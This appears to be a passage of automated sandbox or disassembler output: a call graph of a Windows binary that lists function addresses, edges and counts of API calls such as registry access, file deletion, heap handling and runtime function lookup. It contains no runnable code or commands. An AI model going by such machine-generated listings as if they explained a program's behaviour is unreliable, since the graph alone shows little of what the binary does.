8361->8384 8365 409fe5 8362->8365 8364 40a090 8363->8364 8366 4031e5 4 API calls 8364->8366 8365->8355 8367 402bab 2 API calls 8365->8367 8368 40a0b0 8366->8368 8369 409fff 8367->8369 8372 4031e5 4 API calls 8368->8372 8370 405b6f 6 API calls 8369->8370 8371 40a00d 8370->8371 8371->8355 8374 40a021 8371->8374 8373 40a0d0 8372->8373 8376 4031e5 4 API calls 8373->8376 8375 402bab 2 API calls 8374->8375 8375->8361 8377 40a0f0 8376->8377 8378 4031e5 4 API calls 8377->8378 8379 40a110 8378->8379 8380 40a134 8379->8380 8381 4031e5 4 API calls 8379->8381 8380->8383 8438 408b2c 8380->8438 8381->8380 8383->8358 8383->8361 8385 402b7c 2 API calls 8384->8385 8386 4056cd 8385->8386 8387 402b7c 2 API calls 8386->8387 8388 4056d4 8386->8388 8387->8388 8389 408c4d 8388->8389 8390 413ba4 6 API calls 8389->8390 8391 408c5c 8390->8391 8392 408f02 8391->8392 8393 408f3a 8391->8393 8396 40903e 8391->8396 8395 405b6f 6 API calls 8392->8395 8394 405b6f 6 API calls 8393->8394 8410 408f51 8394->8410 8397 408f0c 8395->8397 8412 413aca 8396->8412 8397->8396 8401 408f31 8397->8401 8441 40a1b6 8397->8441 8399 405b6f 6 API calls 8399->8410 8400 402bab 2 API calls 8400->8396 8401->8400 8403 409031 8404 402bab 2 API calls 8403->8404 8404->8401 8405 409022 8406 402bab 2 API calls 8405->8406 8407 409028 8406->8407 8408 402bab 2 API calls 8407->8408 8408->8401 8409 402bab GetProcessHeap HeapFree 8409->8410 8410->8396 8410->8399 8410->8401 8410->8403 8410->8405 8410->8409 8411 40a1b6 14 API calls 8410->8411 8475 4044ee 8410->8475 8411->8410 8413 409451 8412->8413 8414 413ad7 8412->8414 8422 405695 8413->8422 8415 405781 4 API calls 8414->8415 8416 413af0 8415->8416 8417 405781 4 API calls 8416->8417 8418 413afe 8417->8418 8419 405762 4 API calls 8418->8419 8420 413b0e 8419->8420 8420->8413 8421 405781 4 API calls 8420->8421 8421->8413 8423 4056a0 8422->8423 8424 4056b9 8422->8424 8425 402bab 2 API calls 8423->8425 8424->8312 8426 4056b3 8425->8426 8427 402bab 2 API calls 8426->8427 8427->8424 8429 40a368 8428->8429 8430 40a39a 8428->8430 8435 4031e5 4 API calls 8429->8435 8431 4031e5 4 API calls 8430->8431 8436 40a3af 8430->8436 8431->8436 8432 408b2c 4 API calls 8434 40a3ca 8432->8434 8433 40a38a 8433->8315 8434->8433 8437 408b2c 4 API calls 8434->8437 8435->8433 8436->8432 8436->8434 8437->8433 8439 4031e5 4 API calls 8438->8439 8440 408b3e 8439->8440 8440->8383 8442 40a202 8441->8442 8443 40a1c3 8441->8443 8597 405f08 8442->8597 8445 405b6f 6 API calls 8443->8445 8447 40a1d0 8445->8447 8446 40a1fc 8446->8401 8447->8446 8448 40a1f3 8447->8448 8485 40a45b 8447->8485 8453 402bab 2 API calls 8448->8453 8450 40a333 8452 402bab 2 API calls 8450->8452 8452->8446 8453->8446 8454 405b6f 6 API calls 8456 40a245 8454->8456 8455 40a25d 8457 405b6f 6 API calls 8455->8457 8456->8455 8458 413a58 13 API calls 8456->8458 8463 40a26b 8457->8463 8459 40a257 8458->8459 8462 402bab 2 API calls 8459->8462 8460 40a28b 8461 405b6f 6 API calls 8460->8461 8469 40a297 8461->8469 8462->8455 8463->8460 8464 40a284 8463->8464 8604 40955b 8463->8604 8467 402bab 2 API calls 8464->8467 8465 40a2b7 8465->8450 8468 405b6f 6 API calls 8465->8468 8474 402bab 2 API calls 8465->8474 8621 4098a7 8465->8621 8467->8460 8468->8465 8469->8465 8470 40a2b0 8469->8470 8611 40968e 8469->8611 8471 402bab 2 API calls 8470->8471 8471->8465 8474->8465 8476 402b7c 2 API calls 8475->8476 8480 404512 8476->8480 8477 40457c 8477->8410 8479 404585 GetLastError 8479->8477 8481 404592 8479->8481 8480->8477 8480->8479 8482 402bab 2 API calls 8480->8482 8484 402b7c 2 API calls 8480->8484 8876 4044a7 8480->8876 8483 402bab 2 API calls 8481->8483 8482->8480 8483->8477 8484->8480 8630 40642c 8485->8630 8487 40a469 8488 40c4ff 8487->8488 8633 4047e6 8487->8633 8488->8448 8491 4040bb 12 API calls 8492 40bf88 8491->8492 8492->8488 8493 403c90 8 API calls 8492->8493 8494 40bfaa 8493->8494 8495 402b7c 2 API calls 8494->8495 8497 40bfc1 8495->8497 8496 40c4f3 8498 403f9e 5 API calls 8496->8498 8499 40c3aa 8497->8499 8640 40a423 8497->8640 8498->8488 8499->8496 8502 4056bf 2 API calls 8499->8502 8505 40c4e3 8499->8505 8500 402bab 2 API calls 8500->8496 8504 40c3d2 8502->8504 8504->8505 8507 4040bb 12 API calls 8504->8507 8505->8500 8506 405f08 4 API calls 8508 40c005 8506->8508 8509 40c3f3 8507->8509 8510 40c021 8508->8510 8643 40a43f 8508->8643 8512 40c4d1 8509->8512 8700 405a52 8509->8700 8511 4031e5 4 API calls 8510->8511 8514 40c034 8511->8514 8517 413aca 4 API calls 8512->8517 8523 4031e5 4 API calls 8514->8523 8518 40c4dd 8517->8518 8521 405695 2 API calls 8518->8521 8519 40c411 8705 405a87 8519->8705 8520 402bab 2 API calls 8520->8510 8521->8505 8529 40c04d 8523->8529 8524 40c4b3 8525 402bab 2 API calls 8524->8525 8527 40c4cb 8525->8527 8526 405a52 4 API calls 8537 40c423 8526->8537 8528 403f9e 5 API calls 8527->8528 8528->8512 8531 4031e5 4 API calls 8529->8531 8530 405a87 4 API calls 8530->8537 8532 40c085 8531->8532 8534 4031e5 4 API calls 8532->8534 8533 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8533->8537 8535 40c09c 8534->8535 8538 4031e5 4 API calls 8535->8538 8536 402bab 2 API calls 8536->8537 8537->8524 8537->8526 8537->8530 8537->8533 8537->8536 8539 40c0b3 8538->8539 8540 4031e5 4 API calls 8539->8540 8541 40c0ca 8540->8541 8542 4031e5 4 API calls 8541->8542 8543 40c0e7 8542->8543 8544 4031e5 4 API calls 8543->8544 8545 40c100 8544->8545 8546 4031e5 4 API calls 8545->8546 8547 40c119 8546->8547 8548 4031e5 4 API calls 8547->8548 8549 40c132 8548->8549 8550 4031e5 4 API calls 8549->8550 8551 40c14b 8550->8551 8552 4031e5 4 API calls 8551->8552 8553 40c164 8552->8553 8554 4031e5 4 API calls 8553->8554 8555 40c17d 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c196 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c1af 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c1c8 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c1de 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c1f4 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c20d 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c226 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c23f 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c258 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c273 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c28a 8576->8577 8578 4031e5 4 API calls 8577->8578 8581 40c2d5 8578->8581 8579 40c3a2 8580 402bab 2 API calls 8579->8580 8580->8499 8581->8579 8582 4031e5 4 API calls 8581->8582 8583 40c315 8582->8583 8584 40c38b 8583->8584 8646 404866 8583->8646 8585 403c40 5 API calls 8584->8585 8587 40c397 8585->8587 8589 403c40 5 API calls 8587->8589 8589->8579 8590 40c382 8592 403c40 5 API calls 8590->8592 8592->8584 8594 406c4c 6 API calls 8595 40c355 8594->8595 8595->8590 8670 4126a7 8595->8670 8598 4031e5 4 API calls 8597->8598 8599 405f1d 8598->8599 8600 402b7c 2 API calls 8599->8600 8603 405f55 8599->8603 8601 405f36 8600->8601 8602 4031e5 4 API calls 8601->8602 8601->8603 8602->8603 8603->8446 8603->8450 8603->8454 8603->8455 8605 409673 8604->8605 8609 40956d 8604->8609 8605->8464 8606 408b45 6 API calls 8606->8609 8607 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8607->8609 8608 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8608->8609 8609->8605 8609->8606 8609->8607 8609->8608 8610 402bab GetProcessHeap HeapFree 8609->8610 8610->8609 8612 4040bb 12 API calls 8611->8612 8620 4096a9 8612->8620 8613 40989f 8613->8470 8614 409896 8615 403f9e 5 API calls 8614->8615 8615->8613 8617 408b45 6 API calls 8617->8620 8618 402bab GetProcessHeap HeapFree 8618->8620 8619 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8619->8620 8620->8613 8620->8614 8620->8617 8620->8618 8620->8619 8869 4059d8 8620->8869 8622 4040bb 12 API calls 8621->8622 8628 4098c1 8622->8628 8623 4099fb 8623->8465 8624 4099f3 8625 403f9e 5 API calls 8624->8625 8625->8623 8626 4059d8 4 API calls 8626->8628 8627 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8627->8628 8628->8623 8628->8624 8628->8626 8628->8627 8629 402bab GetProcessHeap HeapFree 8628->8629 8629->8628 8631 4031e5 4 API calls 8630->8631 8632 406441 GetNativeSystemInfo 8631->8632 8632->8487 8634 4031e5 4 API calls 8633->8634 8637 40480a 8634->8637 8635 40485d 8635->8488 8635->8491 8636 4031e5 4 API calls 8636->8637 8637->8635 8637->8636 8638 40484f 8637->8638 8639 403c40 5 API calls 8638->8639 8639->8635 8641 4031e5 4 API calls 8640->8641 8642 40a435 8641->8642 8642->8506 8644 4031e5 4 API calls 8643->8644 8645 40a451 8644->8645 8645->8520 8647 4031e5 4 API calls 8646->8647 8648 40487c 8647->8648 8648->8590 8649 406c4c 8648->8649 8710 4068eb 8649->8710 8651 406e02 8651->8594 8652 406cab 8722 40469b 8652->8722 8653 406c6c 8653->8651 8653->8652 8719 406894 8653->8719 8660 406df1 8661 40469b 4 API calls 8660->8661 8661->8651 8662 406cef 8662->8660 8663 4031e5 4 API calls 8662->8663 8664 406d26 8663->8664 8664->8660 8665 40771e 6 API calls 8664->8665 8669 406d57 8665->8669 8666 406da2 8667 4031e5 4 API calls 8666->8667 8667->8660 8669->8666 8735 4068b0 8669->8735 8671 4126bb 8670->8671 8675 4126d1 8670->8675 8680 412840 8671->8680 8791 40488c 8671->8791 8675->8680 8797 407055 8675->8797 8676 412837 8677 403c40 5 API calls 8676->8677 8677->8680 8680->8590 8681 41281e 8682 4070ff 6 API calls 8681->8682 8682->8676 8683 407055 6 API calls 8684 412742 8683->8684 8684->8681 8685 40719a 6 API calls 8684->8685 8686 41276e 8685->8686 8687 412804 8686->8687 8813 406f4a 8686->8813 8841 4070ff 8687->8841 8690 41279a 8819 412553 8690->8819 8863 405907 8700->8863 8702 405a61 8703 405a76 8702->8703 8704 405907 4 API calls 8702->8704 8703->8519 8704->8702 8706 402b7c 2 API calls 8705->8706 8709 405a99 8706->8709 8707 405ade 8707->8537 8709->8707 8866 40595e 8709->8866 8738 4076a8 8710->8738 8712 406913 8713 40771e 6 API calls 8712->8713 8714 406a61 8712->8714 8717 406949 8713->8717 8714->8653 8715 404678 4 API calls 8715->8717 8717->8714 8717->8715 8718 40771e 6 API calls 8717->8718 8744 4046c2 8717->8744 8718->8717 8720 4031e5 4 API calls 8719->8720 8721 4068a6 8720->8721 8721->8653 8723 4046a4 8722->8723 8725 4046b4 8722->8725 8724 4031e5 4 API calls 8723->8724 8724->8725 8725->8651 8726 404678 8725->8726 8727 4031e5 4 API calls 8726->8727 8728 40468b 8727->8728 8728->8651 8729 40771e 8728->8729 8730 407737 8729->8730 8733 407748 8729->8733 8731 407644 6 API calls 8730->8731 8732 407741 8731->8732 8734 406baa 6 API calls 8732->8734 8733->8662 8734->8733 8736 4031e5 4 API calls 8735->8736 8737 4068c2 8736->8737 8737->8669 8739 4076c1 8738->8739 8741 4076d2 8738->8741 8752 407644 8739->8752 8741->8712 8745 4046d3 8744->8745 8746 4046d9 8744->8746 8787 40464c 8745->8787 8748 404678 4 API calls 8746->8748 8751 4046e9 8746->8751 8748->8751 8749 404714 8749->8717 8750 40469b 4 API calls 8750->8749 8751->8749 8751->8750 8753 407653 8752->8753 8754 407661 8752->8754 8753->8754 8760 406a6b 8753->8760 8756 406baa 8754->8756 8757 406bbb 8756->8757 8759 406bc8 8756->8759 8757->8759 8768 407402 8757->8768 8759->8741 8764 406a81 8760->8764 8761 402b7c 2 API calls 8761->8764 8762 406b8b 8762->8754 8763 406894 4 API calls 8763->8764 8764->8761 8764->8762 8764->8763 8765 406b96 8764->8765 8766 402bab 2 API calls 8764->8766 8767 402bab 2 API calls 8765->8767 8766->8764 8767->8762 8769 407644 6 API calls 8768->8769 8770 407412 8769->8770 8771 402b7c 2 API calls 8770->8771 8778 407450 8770->8778 8772 407483 8771->8772 8773 402b7c 2 API calls 8772->8773 8772->8778 8775 4074ce 8773->8775 8774 4074da 8776 4068cc 2 API calls 8774->8776 8775->8774 8777 402b7c 2 API calls 8775->8777 8776->8778 8781 40751f 8777->8781 8778->8759 8779 40752b 8780 4068cc 2 API calls 8779->8780 8780->8774 8781->8779 8783 4068cc 8781->8783 8784 4068d6 8783->8784 8786 4068e3 8783->8786 8785 402bab GetProcessHeap HeapFree 8784->8785 8784->8786 8785->8786 8786->8779 8788 404666 8787->8788 8789 404659 8787->8789 8788->8746 8790 4031e5 4 API calls 8789->8790 8790->8788 8792 4047e6 5 API calls 8791->8792 8794 404897 8792->8794 8793 40489c 8793->8675 8794->8793 8849 4047c7 8794->8849 8798 40706f 8797->8798 8799 407084 8797->8799 8798->8799 8800 407644 6 API calls 8798->8800 8804 4070e4 8799->8804 8852 406fd2 8799->8852 8801 40707d 8800->8801 8803 406baa 6 API calls 8801->8803 8803->8799 8804->8676 8805 40719a 8804->8805 8806 4071b0 8805->8806 8810 4071c5 8805->8810 8807 407644 6 API calls 8806->8807 8806->8810 8808 4071be 8807->8808 8809 406baa 6 API calls 8808->8809 8809->8810 8811 406fd2 4 API calls 8810->8811 8812 407226 8810->8812 8811->8812 8812->8681 8812->8683 8814 406f64 8813->8814 8817 406f75 8813->8817 8815 407644 6 API calls 8814->8815 8816 406f6e 8815->8816 8818 406baa 6 API calls 8816->8818 8817->8690 8818->8817 8860 4060ac 8819->8860 8842 407116 8841->8842 8847 40712b 8841->8847 8843 407644 6 API calls 8842->8843 8842->8847 8844 407124 8843->8844 8845 406baa 6 API calls 8844->8845 8845->8847 8846 406fd2 4 API calls 8848 407187 8846->8848 8847->8846 8847->8848 8848->8681 8850 4031e5 4 API calls 8849->8850 8851 4047d9 8850->8851 8851->8675 8853 406fde 8852->8853 8854 4031e5 4 API calls 8853->8854 8859 407027 8853->8859 8855 406ffa 8854->8855 8856 4031e5 4 API calls 8855->8856 8857 407011 8856->8857 8858 4031e5 4 API calls 8857->8858 8858->8859 8859->8804 8861 4031e5 4 API calls 8860->8861 8862 4060bb 8861->8862 8862->8862 8864 4031e5 4 API calls 8863->8864 8865 40591a 8864->8865 8865->8702 8867 4031e5 4 API calls 8866->8867 8868 405971 8867->8868 8868->8709 8870 4031e5 4 API calls 8869->8870 8871 4059ed 8870->8871 8872 402b7c 2 API calls 8871->8872 8875 405a38 8871->8875 8873 405a16 8872->8873 8874 4031e5 4 API calls 8873->8874 8873->8875 8874->8875 8875->8620 8877 4031e5 4 API calls 8876->8877 8878 4044b9 8877->8878 8878->8480 9798 40a349 9799 4098a7 13 API calls 9798->9799 9800 40a359 9799->9800 9037 408952 9058 40823f 9037->9058 9040 408960 9041 4056bf 2 API calls 9040->9041 9043 40896a 9041->9043 9086 408862 9043->9086 9045 413aca 4 API calls 9047 4089d4 9045->9047 9046 408975 9055 4089c4 9046->9055 9094 4087d6 9046->9094 9048 405695 2 API calls 9047->9048 9050 4089df 9048->9050 9055->9045 9056 402bab 2 API calls 9057 40899d 9056->9057 9057->9055 9057->9056 9059 40824d 9058->9059 9060 40831b 9059->9060 9061 4031e5 4 API calls 9059->9061 9060->9040 9074 4083bb 9060->9074 9062 40826d 9061->9062 9063 4031e5 4 API calls 9062->9063 9064 408289 9063->9064 9065 4031e5 4 API calls 9064->9065 9066 4082a5 9065->9066 9067 4031e5 4 API calls 9066->9067 9068 4082c1 9067->9068 9069 4031e5 4 API calls 9068->9069 9070 4082e2 9069->9070 9071 4031e5 4 API calls 9070->9071 9072 4082ff 9071->9072 9073 4031e5 4 API calls 9072->9073 9073->9060 9122 408363 9074->9122 9077 4084ab 9077->9040 9078 4056bf 2 API calls 9083 4083f4 9078->9083 9079 408492 9080 413aca 4 API calls 9079->9080 9081 4084a0 9080->9081 9082 405695 2 API calls 9081->9082 9082->9077 9083->9079 9125 40815d 9083->9125 9140 40805d 9083->9140 9155 404b8f 9086->9155 9088 408946 9088->9046 9089 40887e 9089->9088 9090 4031e5 4 API calls 9089->9090 9091 40893e 9089->9091 9093 402b7c 2 API calls 9089->9093 9090->9089 9158 404a39 9091->9158 9093->9089 9095 402b7c 2 API calls 9094->9095 9096 4087e7 9095->9096 9097 40885a 9096->9097 9098 4031e5 4 API calls 9096->9098 9106 408749 9097->9106 9100 408802 9098->9100 9099 402bab 2 API calls 9099->9097 9102 40884d 9100->9102 9104 408853 9100->9104 9167 408522 9100->9167 9171 4084b4 9100->9171 9174 4084d4 9102->9174 9104->9099 9107 404b8f 5 API calls 9106->9107 9112 408765 9107->9112 9108 4031e5 4 API calls 9108->9112 9109 4087c7 9111 404a39 5 API calls 9109->9111 9110 408522 4 API calls 9110->9112 9113 4087cf 9111->9113 9112->9108 9112->9109 9112->9110 9112->9113 9114 4085d1 9113->9114 9116 4086c2 9114->9116 9120 4085e9 9114->9120 9116->9057 9117 402bab 2 API calls 9117->9120 9118 4031e5 4 API calls 9118->9120 9120->9116 9120->9117 9120->9118 9180 4089e6 9120->9180 9199 4086c9 9120->9199 9203 4036a3 9120->9203 9123 4031e5 4 API calls 9122->9123 9124 408386 9123->9124 9124->9077 9124->9078 9126 40816f 9125->9126 9127 4081b6 9126->9127 9128 4081fd 9126->9128 9139 4081ef 9126->9139 9129 405872 4 API calls 9127->9129 9130 405872 4 API calls 9128->9130 9131 4081cf 9129->9131 9132 408213 9130->9132 9133 405872 4 API calls 9131->9133 9134 405872 4 API calls 9132->9134 9135 4081df 9133->9135 9136 408222 9134->9136 9137 405872 4 API calls 9135->9137 9138 405872 4 API calls 9136->9138 9137->9139 9138->9139 9139->9083 9141 40808c 9140->9141 9142 4080d2 9141->9142 9143 408119 9141->9143 9154 40810b 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 40812f 9144->9146 9147 4080eb 9145->9147 9149 405872 4 API calls 9146->9149 9148 405872 4 API calls 9147->9148 9150 4080fb 9148->9150 9151 40813e 9149->9151 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9083 9161 404a19 9155->9161 9157 404ba0 9157->9089 9164 4049ff 9158->9164 9160 404a44 9160->9088 9162 4031e5 4 API calls 9161->9162 9163 404a2c RegOpenKeyW 9162->9163 9163->9157 9165 4031e5 4 API calls 9164->9165 9166 404a12 RegCloseKey 9165->9166 9166->9160 9169 408534 9167->9169 9168 4085af 9168->9100 9169->9168 9177 4084ee 9169->9177 9172 4031e5 4 API calls 9171->9172 9173 4084c7 9172->9173 9173->9100 9175 4031e5 4 API calls 9174->9175 9176 4084e7 9175->9176 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 408501 9178->9179 9179->9168 9181 4031e5 4 API calls 9180->9181 9182 408a06 9181->9182 9183 408b21 9182->9183 9184 4031e5 4 API calls 9182->9184 9183->9120 9187 408a32 9184->9187 9185 408b17 9215 403649 9185->9215 9187->9185 9206 403666 9187->9206 9190 4031e5 4 API calls 9192 408a88 9190->9192 9193 4031e5 4 API calls 9192->9193 9198 408b0e 9192->9198 9194 408ac4 9193->9194 9195 405b6f 6 API calls 9194->9195 9196 408aff 9195->9196 9196->9198 9209 408508 9196->9209 9212 40362f 9198->9212 9200 408744 9199->9200 9201 4086e2 9199->9201 9200->9120 9201->9200 9202 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9201->9202 9202->9201 9204 4031e5 4 API calls 9203->9204 9205 4036b5 9204->9205 9205->9120 9207 4031e5 4 API calls 9206->9207 9208 403679 9207->9208 9208->9190 9208->9198 9210 4031e5 4 API calls 9209->9210 9211 40851b 9210->9211 9211->9198 9213 4031e5 4 API calls 9212->9213 9214 403642 9213->9214 9214->9185 9216 4031e5 4 API calls 9215->9216 9217 40365c 9216->9217 9217->9183 9818 40f252 9819 404bee 6 API calls 9818->9819 9820 40f269 9819->9820 9821 404bee 6 API calls 9820->9821 9832 40f2ff 9820->9832 9822 40f282 9821->9822 9823 404bee 6 API calls 9822->9823 9824 40f290 9823->9824 9835 404c4e 9824->9835 9826 40f2a7 9827 405872 4 API calls 9826->9827 9826->9832 9828 40f2cd 9827->9828 9829 405872 4 API calls 9828->9829 9830 40f2dc 9829->9830 9831 405872 4 API calls 9830->9831 9833 40f2ee 9831->9833 9834 405762 4 API calls 9833->9834 9834->9832 9836 402b7c 2 API calls 9835->9836 9838 404c60 9836->9838 9837 404ca4 9837->9826 9838->9837 9839 4031e5 4 API calls 9838->9839 9840 404c8d 9839->9840 9840->9837 9841 402bab 2 API calls 9840->9841 9841->9837 9842 41045c 9843 4040bb 12 API calls 9842->9843 9844 410477 9843->9844 9845 41060b 9844->9845 9873 407851 9844->9873 9847 41048f 9849 407851 2 API calls 9847->9849 9853 410604 9847->9853 9848 403f9e 5 API calls 9848->9845 9850 4104a9 9849->9850 9855 4105e0 9850->9855 9856 405ae9 6 API calls 9850->9856 9858 41056f 9850->9858 9859 4105eb 9850->9859 9851 402bab 2 API calls 9851->9853 9852 402bab 2 API calls 9854 4105fb 9852->9854 9853->9848 9854->9851 9857 402bab 2 API calls 9855->9857 9855->9859 9856->9850 9857->9859 9858->9855 9860 4105d6 9858->9860 9862 412269 6 API calls 9858->9862 9859->9852 9859->9854 9861 402bab 2 API calls 9860->9861 9861->9855 9863 410580 9862->9863 9863->9860 9864 405872 4 API calls 9863->9864 9865 410599 9864->9865 9866 405872 4 API calls 9865->9866 9867 4105a9 9866->9867 9868 405872 4 API calls 9867->9868 9869 4105bb 9868->9869 9870 405872 4 API calls 9869->9870 9871 4105cd 9870->9871 9872 402bab 2 API calls 9871->9872 9872->9860 9874 407866 9873->9874 9875 402b7c 2 API calls 9874->9875 9876 407899 9874->9876 9875->9876 9876->9847 9279 40f561 9282 40f4b6 9279->9282 9283 413b28 6 API calls 9282->9283 9288 40f4bf 9283->9288 9284 40f559 9285 413a58 13 API calls 9285->9288 9286 405b6f 6 API calls 9286->9288 9287 402bab GetProcessHeap HeapFree 9287->9288 9288->9284 9288->9285 9288->9286 9288->9287 9292 403b64 9293 4031e5 4 API calls 9292->9293 9294 403b77 PathFileExistsW 9293->9294 9900 40d069 9901 404bee 6 API calls 9900->9901 9902 40d080 9901->9902 9903 404bee 6 API calls 9902->9903 9925 40d1e2 9902->9925 9904 40d099 9903->9904 9905 404bee 6 API calls 9904->9905 9906 40d0a7 9905->9906 9941 404ba7 9906->9941 9909 404bee 6 API calls 9910 40d0c5 9909->9910 9911 404c4e 6 API calls 9910->9911 9912 40d0dc 9911->9912 9913 404bee 6 API calls 9912->9913 9914 40d0eb 9913->9914 9915 404ba7 4 API calls 9914->9915 9916 40d0fa 9915->9916 9917 404bee 6 API calls 9916->9917 9918 40d109 9917->9918 9919 404c4e 6 API calls 9918->9919 9920 40d123 9919->9920 9921 405872 4 API calls 9920->9921 9920->9925 9922 40d14a 9921->9922 9923 405872 4 API calls 9922->9923 9924 40d159 9923->9924 9926 405872 4 API calls 9924->9926 9927 40d16b 9926->9927 9928 405781 4 API calls 9927->9928 9929 40d179 9928->9929 9930 405872 4 API calls 9929->9930 9931 40d18b 9930->9931 9932 405762 4 API calls 9931->9932 9933 40d19f 9932->9933 9934 405872 4 API calls 9933->9934 9935 40d1b1 9934->9935 9936 405781 4 API calls 9935->9936 9937 40d1bf 9936->9937 9938 405872 4 API calls 9937->9938 9939 40d1d1 9938->9939 9940 405762 4 API calls 9939->9940 9940->9925 9942 4031e5 4 API calls 9941->9942 9943 404bca 9942->9943 9943->9909 9321 40f16e 9322 4056bf 2 API calls 9321->9322 9323 40f17b 9322->9323 9324 412093 20 API calls 9323->9324 9325 40f19e 9324->9325 9326 412093 20 API calls 9325->9326 9327 40f1b6 9326->9327 9328 412093 20 API calls 9327->9328 9329 40f1cc 9328->9329 9330 412093 20 API calls 9329->9330 9331 40f1e2 9330->9331 9332 413aca 4 API calls 9331->9332 9333 40f1ef 9332->9333 9334 405695 2 API calls 9333->9334 9335 40f1fa 9334->9335 9336 40ce71 9337 413b28 6 API calls 9336->9337 9338 40ce78 9337->9338 9339 405b6f 6 API calls 9338->9339 9341 40ce83 9339->9341 9340 403fbf 7 API calls 9342 40cecc 9340->9342 9344 40ceba 9341->9344 9347 403d74 19 API calls 9341->9347 9348 40cec1 9341->9348 9343 40cefb 9342->9343 9346 403d74 19 API calls 9342->9346 9345 402bab 2 API calls 9344->9345 9345->9348 9349 40cee7 9346->9349 9350 40cead 9347->9350 9348->9340 9351 40cef4 9349->9351 9354 402bab 2 API calls 9349->9354 9350->9344 9353 402bab 2 API calls 9350->9353 9352 402bab 2 API calls 9351->9352 9352->9343 9353->9344 9354->9351 9355 406472 9356 4031e5 4 API calls 9355->9356 9357 406484 Sleep 9356->9357 10017 40f204 10018 405781 4 API calls 10017->10018 10019 40f214 10018->10019 10020 4057df 13 API calls 10019->10020 10021 40f226 10020->10021 9415 403c08 9416 4031e5 4 API calls 9415->9416 9417 403c1a DeleteFileW 9416->9417 9418 410a09 9419 41219c 14 API calls 9418->9419 9420 410a1b 9419->9420 9421 41219c 14 API calls 9420->9421 9422 410a23 9421->9422 9423 41219c 14 API calls 9422->9423 9424 410a2c 9423->9424 9425 41219c 14 API calls 9424->9425 9426 410a38 9425->9426 9427 404b22 6 API calls 9426->9427 9428 410a4c 9427->9428 9429 410a7a 9428->9429 9430 403fbf 7 API calls 9428->9430 9431 410a5c 9430->9431 9432 410a71 9431->9432 9433 413a58 13 API calls 9431->9433 9434 402bab 2 API calls 9432->9434 9435 410a6b 9433->9435 9434->9429 9436 402bab 2 API calls 9435->9436 9436->9432 10022 410d09 10023 410d56 10022->10023 10024 410d17 10022->10024 10026 413a58 13 API calls 10023->10026 10038 406642 10024->10038 10028 410d6f 10026->10028 10029 4056bf 2 API calls 10030 410d2e 10029->10030 10051 405641 10030->10051 10032 410d41 10033 413aca 4 API calls 10032->10033 10034 410d4a 10033->10034 10035 405695 2 API calls 10034->10035 10036 410d50 10035->10036 10037 4036a3 4 API calls 10036->10037 10037->10023 10039 406662 10038->10039 10040 4031e5 4 API calls 10039->10040 10041 406676 10040->10041 10055 4066bf 10041->10055 10046 4066b1 10049 4036a3 4 API calls 10046->10049 10047 4066a7 10048 4036a3 4 API calls 10047->10048 10050 4066ac 10048->10050 10049->10050 10050->10023 10050->10029 10052 405673 10051->10052 10053 40564d 10051->10053 10052->10032 10053->10052 10054 4056fc 4 API calls 10053->10054 10054->10052 10056 4031e5 4 API calls 10055->10056 10057 4066dc 10056->10057 10058 4066f6 SetLastError 10057->10058 10059 406708 GetLastError 10057->10059 10060 406693 10058->10060 10059->10060 10061 406713 10059->10061 10077 406455 10060->10077 10062 4031e5 4 API calls 10061->10062 10063 406725 10062->10063 10063->10060 10064 4031e5 4 API calls 10063->10064 10065 40673f 10064->10065 10066 406753 10065->10066 10067 406749 10065->10067 10069 4031e5 4 API calls 10066->10069 10068 4036a3 4 API calls 10067->10068 10068->10060 10070 406761 10069->10070 10071 40678a 10070->10071 10072 40677c 10070->10072 10074 4036a3 4 API calls 10071->10074 10073 4036a3 4 API calls 10072->10073 10075 406781 10073->10075 10074->10060 10076 4036a3 4 API calls 10075->10076 10076->10060 10078 4031e5 4 API calls 10077->10078 10079 406468 10078->10079 10079->10046 10079->10047 9437 40c509 9438 412093 20 API calls 9437->9438 9439 40c51e 9438->9439 9446 40910d 9447 404b22 6 API calls 9446->9447 9448 409124 9447->9448 9449 40917a 9448->9449 9450 405b6f 6 API calls 9448->9450 9451 40913e 9450->9451 9453 404b22 6 API calls 9451->9453 9458 409173 9451->9458 9452 402bab 2 API calls 9452->9449 9454 409153 9453->9454 9455 40916a 9454->9455 9457 409408 15 API calls 9454->9457 9456 402bab 2 API calls 9455->9456 9456->9458 9459 409164 9457->9459 9458->9452 9460 402bab 2 API calls 9459->9460 9460->9455 9464 410410 9465 4056bf 2 API calls 9464->9465 9466 41041b 9465->9466 9467 412093 20 API calls 9466->9467 9468 41043c 9467->9468 9469 413aca 4 API calls 9468->9469 9470 410449 9469->9470 9471 405695 2 API calls 9470->9471 9472 410454 9471->9472 9499 40c71a 9500 41219c 14 API calls 9499->9500 9501 40c728 9500->9501 10135 410b1a 10136 404bee 6 API calls 10135->10136 10137 410b31 10136->10137 10138 404bee 6 API calls 10137->10138 10148 410c6d 10137->10148 10139 410b5a 10138->10139 10140 404bee 6 API calls 10139->10140 10141 410b69 10140->10141 10142 404bee 6 API calls 10141->10142 10143 410b78 10142->10143 10144 404ba7 4 API calls 10143->10144 10145 410b86 10144->10145 10146 404ba7 4 API calls 10145->10146 10147 410b95 10146->10147 10147->10148 10149 405872 4 API calls 10147->10149 10150 410bd7 10149->10150 10151 405872 4 API calls 10150->10151 10152 410be8 10151->10152 10153 405872 4 API calls 10152->10153 10154 410bf9 10153->10154 10155 405781 4 API calls 10154->10155 10156 410c07 10155->10156 10157 405781 